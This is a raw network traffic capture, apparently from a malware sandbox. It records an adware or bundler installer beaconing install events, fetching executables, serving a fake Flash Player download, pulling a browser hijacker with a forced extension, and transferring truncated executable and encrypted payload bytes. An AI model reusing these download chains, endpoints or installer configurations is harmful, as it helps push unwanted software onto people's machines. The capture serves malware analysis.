GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: k5bIf0I8TsFZu J4ql XPkz4iMrFrbXgTVyem4Nq5fEqJZ9 b7w5MzJAeIerNVm..x-amz-request-id: 2A77CADFFF654825..Date: Thu, 29 Oct 2015 07:31:15 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=3775 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: DrXGQoHGwzJzstNg10GkQJOXoTxcA0kmD9Uy7IWiu8IrGMhj FxIyDNsgGpKFSDa
x-amz-request-id: 62CE6D9C1696D2F3
Date: Thu, 29 Oct 2015 07:31:17 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: DrXGQoHGwzJzstNg10GkQJOXoTxcA0kmD9Uy7IWiu8IrGMhj FxIyDNsgGpKFSDa..x-amz-request-id: 62CE6D9C1696D2F3..Date: Thu, 29 Oct 2015 07:31:17 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=4473 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: lqhArZ1TfN8lUqnsY33ZPSOGfeAgDIZt5o3UgT9O1rvunQlFrqBaMnKOdZdGb64U
x-amz-request-id: FB65CBCBA2565DE4
Date: Thu, 29 Oct 2015 07:31:27 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: lqhArZ1TfN8lUqnsY33ZPSOGfeAgDIZt5o3UgT9O1rvunQlFrqBaMnKOdZdGb64U..x-amz-request-id: FB65CBCBA2565DE4..Date: Thu, 29 Oct 2015 07:31:27 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=8733 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: za9H2ePsoFOFOZZcW5s9M9khdLE0lUf05xcASPNTsTzfIXwApo5R8pSioe0oJgDE
x-amz-request-id: 37D13C07C962DD49
Date: Thu, 29 Oct 2015 07:31:28 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: za9H2ePsoFOFOZZcW5s9M9khdLE0lUf05xcASPNTsTzfIXwApo5R8pSioe0oJgDE..x-amz-request-id: 37D13C07C962DD49..Date: Thu, 29 Oct 2015 07:31:28 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:05 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Thu, 29 Oct 2015 07:31:05 GMT..Connection: keep-alive..Content-Type: application/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codename Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:54 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 121
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:54 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:30:54 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:58 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:30:58 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:59 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:30:59 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:59 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:30:59 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:59 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:30:59 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 183
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:31:05 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:31:05 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 196
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:31:05 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:31:05 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 173
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.randkeygen.com/crcb/123/installer.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:31:07 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:31:07 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:31:09 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:31:10 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:31:10 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 164
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.djapp.info/?file=bundle&v=2&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:31:14 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:31:14 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
GET /crossbrowse/ie/107/ie.zip.003 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:07 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=35168
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1446103867.dop019.am4.t,1446103867.cds064.am4.c
l...%...J.....=.6...<.,........#....U.s.I.* m..e_O.'.x..4.SV..x...q...d.[.R...A_.....&........."b.....g.........^...N}...$............^..O.&.S....y.Q..vm.!.W........j.kt.......D....%G......*..$.k...@c".e...wu..b.3..oV.....G..ER...o.V..co....v.P..[}.....m.......3.;.E..r.O...{."..'V.-....V.L.4....RF. .:`....M.8..z....z.m....7>...<t?.)$g.'.....~..i.i..W..gV...vZV......dy.cec<F2.8..ZT.W...}d.m..m5..h^...../.@.c.F.....vW......<.PQ....I.8...L-...C...........<%....n..b.4.3gJ.h.D.U...8....PV80..R.so~..k..S QGp4.%.i..I..?...Z@%.B..U!1..m.3.........|7h..s.;V,WBbPQ}=.......%..o......hc........5.9...v|.t...<"....t.Z6.........f.4.3.H..Y ...d...C-.u...B.....RIK:.*$$JP.........q..v.-........$....q..@.../-.. 6Ie.....7....0b...NR.Ti.<U.@a.$.8.m`.i... ~.Y.)j0....%....M.... .CF?0......pd.........M......~m.8.#3b .>...3|`./|W.=../#7j\U..k..@7..G.1.K..?=J../ ?....M...U.`...P.2....A&'?.:oI...\.}6...=k..D..Jv..<HfG..).>p..?.R1....GUo._.mb.M" X...6........#...V$...........GX[R...=.xX.C ~N.2..!gs.(.o...qa.......y0..G......p$0. ^.`.@.*..)?....u.&...L......6....................Q$....4AJFn....kj...................q...Q.K;.E.}..\9eL..jO4.....N..Y.........}GD{.j.....d.c.(...uMK$.h.T........~0..T.<a......PPC..x..&.%`}."5...Q%.4RS..F>@T.}...;..w...zOoL....^DX.<..'.M.Nl\..E{(.}....5.s.(....a.[...,....@.xD.:$.D?.h...:T.=r./.VD.V......k.J..9.dC..g.>_.9.........(RiV......]...}....u7.J..:c.,...D....O..-..A.x.... PP..j;...b...TA..(.,]... r..........t.....5.7`H.)<6A...9.....tD...bl.]e....F....{ .....5..
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.004 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:07 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=35172
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1446103867.dop019.am4.t,1446103867.cds035.am4.c
......."`...P.PB.............z.....R^z......cxT...x... ;K.....8..9i....|9..7...D..p[.2..!!.S.._.^..Z..W..8.@.'..\&!.!k...~..4.......f.V.u...0...^......,T;.....%......ch...F..c.........G.2../l.wr 1.&.?!..r.k.U....}%....w....}.2...}......oD.KX.G....p...s...$.W...c.Q.*<.4...Lz...@r.g;....~..w#..........`..@..m...){..$.......=z...J23..Bp....~.2.j.......pJ..X..C... .U.O5..h............._W...)#....:_lk.b.Z'..]..s0...6Y%..W........<...cP\Y..G.u.,U..B.og...8.C.~.8~..tj...t ....TT.-UQ....M.....1N-.x....P.p.#...wI..W...G.[.jO..Q.2.V1=..,/.......~..........."..Hma..se...^?.k....=...5...p.....I..G.hm. .vD....._...[.l...,.......s....O.....WU.v-:'.j..%...|....7.g...'..o1..._m.,.!.n.V.........Y5...}s<t..G.R3;R;8.....yP=.-.N...l{..r9..4.n&...U4..n..p.W....{d/l......*....!O*.j.}...%Q.....k.j..1=^.@G....!jI..5.....^7.O. ...DwR.....J/.@..4d."... ..$...#..........Xc.R>Vv.......;.d..C..W....'.....8 .*4Xw.drM.^...UE.C...]>.....ycA.... ....l..:..z..y....=I......9.........z.y......uX.... .T..........d-dj.7.d.!Q.qCqj.4.S{.&.".......s;..P.\.l..7...-OP....I...._\.YX2.6.Mb..._...5O.4....e..tyo...z.z.2.8..5........W..7......|.$............^..]..x...|...S...$....F.|_.SS......=...'...`rX....y...e.O..b...............U9hPfr..5KJ6;&.....d.d.......... .j....Wu.:...hk...a..s...]......?..T.]..8.cRN...........6..C=[.k....`......s]$.B, ....7;A......... ^.h~{..\:ybG.$..f.Q..l........#..FB.. ..........;.,RS.4].B-...N.EyNE...q.P_..g..}AY~_gz......42...%......Nx..D.D.!.]...[..o.1..&....."W.........nKK..).....<.x.@............?.m......c
<<< skipped >>>
GET /iqa/install_flash_player_ppapi.exe HTTP/1.1
Host: d22nes4susdva1.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 19198128
Connection: keep-alive
Date: Sat, 05 Sep 2015 01:26:25 GMT
Last-Modified: Tue, 11 Aug 2015 10:54:00 GMT
ETag: "c3f3ae94549aa626ea751c5e64e6314c"
Accept-Ranges: bytes
Server: AmazonS3
Age: 53613
X-Cache: Hit from cloudfront
Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 4haewE7Av09soC0H4UNI-pzRODloIPaxcgeGugAf-m3jYZj5iUczpg==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GU...4...4...4...f...4...L...4..$....4..$....4...4...4...L..@4...L...4...f...4...4...4...L...4..Rich.4..........................PE..L......U......................"...................@.......................... %.....P.$...@.................................te............!...........$.......$.. ..................................X,..@...............`............................text...D........................... ..`.rdata..............................@..@.data...h?.......$...b..............@....rsrc.....!...... !.................@..@.reloc..Z0....$..2....$.............@..B..................................................................................................................................................................................................................................................................................................................................|..V.t$..D6.......P..|..Y.p..@...@.......^.... ..`......L$......I..H.....t..........t..@. A..3......t..I..DH..3..VW.|$...................;.~.2.. .B........LA..G....DB...NHHf..IIf;.u...u..._^...V.t$...W............w...;.~.2..0.j....J. ........LA..F..DB...O@@f..AAf;.u...u..._^......L$.V..........%...;.^u..t$..8.....t.3.@..3....SV....W..t..@...3. F.@..W.Q{.......F.Y...TB.......ABBOu._^.....[.....u...P..I.SVW3..tH.2.....vI...f..0s.f..9v.@@Ju...v1;.v.f.x.-u......f..0r.f..9w.k..@...@J.|..u...t....._^[..D$...t..
<<< skipped >>>
GET hXXp://json.lxhwspv.com/?adv_id=128&domain=LxHWSpv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en HTTP/1.1
Host: json.lxhwspv.com
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Oct 2015 07:35:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
373..{ .."advID":128, .."primaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."secondaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."requireUnzip":false, .."requireSuccessInstallCheck":true, .."requireExitCodeCheck":false, .."successExitCode":0, .."constParams":"-pub_id=353 -fb -taskbar -ext=pcjnhdkacfipfoicilllfabpbghiegpn",.."mappedParams":[], .."requireRegKeysCheck":true, .."regKeysToCheck":[.."LocalMachine\\SOFTWARE\\Sakura\\gamegogle=*",."LocalMachine\\SOFTWARE\\Wow6432Node\\Sakura\\gamegogle=*"..], .."minutesToSleepBeforeInstall":0,.."preInstallRegCheck": true,.."preInstallRegKeys": [ ..."LocalMachine\\SOFTWARE\\Sakura\\gamegogle=*",."LocalMachine\\SOFTWARE\\Wow6432Node\\Sakura\\gamegogle=*"..],.."blockIfInstalled" : false.}...0..HTTP/1.1 200 OK..Server: nginx..Date: Thu, 29 Oct 2015 07:35:17 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..373..{ .."advID":128, .."primaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."secondaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."requireUnzip":false, .."requireSuccessInstallCheck":true, .."requireExitCodeCheck":false, .."successExitCode":0, .."constParams":"-pub_id=353 -fb -taskbar -ext=pcjnhdkacfipfoicilllfabpbghiegpn",.."mappedPa
<<< skipped >>>
GET /?file=flash HTTP/1.1
Host: VVV.djapp.info
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 29 Oct 2015 07:36:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://d22nes4susdva1.cloudfront.net/iqa/install_flash_player_ppapi.exe
0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Thu, 29 Oct 2015 07:36:07 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..Location: hXXp://d22nes4susdva1.cloudfront.net/iqa/install_flash_player_ppapi.exe..0..
GET /crossbrowse/ie/107/ie.zip.002 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:07 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=35161
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1446103867.dop001.am4.t,1446103867.cds043.am4.c
.R...rf..ol......}>....]..m..sr!..m..Mu..v....\..F.....R...[y8...6...7...h.K.52.'.m];."......;........6.Q.Li.T[...<.....P..SJGtW....~......&.{h.X.;<.x...........iX..........qda.....P....6X.....@.(........... .....!E..t......-O..n..z..N.....4s....=0...xa.o....Q..P....z..oNiC. ...{..B.~..B..o.4...UO[.T....Y..f..*..G......h.1...B.I..1...;..3....(...;..M..Q.5..,F.._..$#..K.(..&...Y...O.Q(.>O......UP.<?2_... .%.D..*.H..y...5..U7.#.....J 7.8b...f.r64h.g ....'y.m..M.fW...e..Y.SG..D...a.h..auwR......v......_.s<E.O......Y..n-..hT..p.$J.`>......-...9.2.Is..5...v.~%{b.H.d).......w..m5......X..v~..!.:.K..xEzE...J...V....It..C6...~V6%...uG..bW...........)}..m..|nh..............wB;.M>.E.h..E0..9.....F.ew....J.J......_*4....*{..V(z..}q........u.:tfT...G9'....6......8.....h..r...`s/..kw.H.~...E..r_!.A.U....kbn......2..m]T&&.....p.p,6_.....~........;V.......:.....MI.Vs..'.(..@...B...S...O...<....q.IG....wB$.......Q.&.....4...{^....g..L...e8...b..(n.B<..b5...o......"......!.G.....m^......2.:...^...1xd[..h.^...I...c~.h.....Q.3tv"^k....!.G...d........=:.....5`a....ab$.r'3..:...l..&.d@p...P"..7..w..@.F:.x...o..j..W...%...Cz?.Np......~....GFP ;..Z.......2.~8....R...s......//.7.....l.U>....r.....{0.Gs:......`.pm......_{.".........#d..")..o..-.... ...E.J.....}.XhH;h...4j. ..E..3]g..9.!..T...``r.hwhEbP......L..S/Is|5..`....}|W(...8E76..7...*.l....Wuw....2.....cO..)4c..=X9..zwT...i.`..Rh.......ST.zLL.9..V.}<..<....5.>\H..,...(.l....q>..i2<~.E.F.....b.......\.....j1W.Q...o\s..}.<....$^w.
<<< skipped >>>
GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Oct 2015 07:30:54 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 May 2015 18:22:16 GMT
Connection: keep-alive
ETag: "55563958-f21d"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.......................... ...............................................t...........C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....C.......D...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
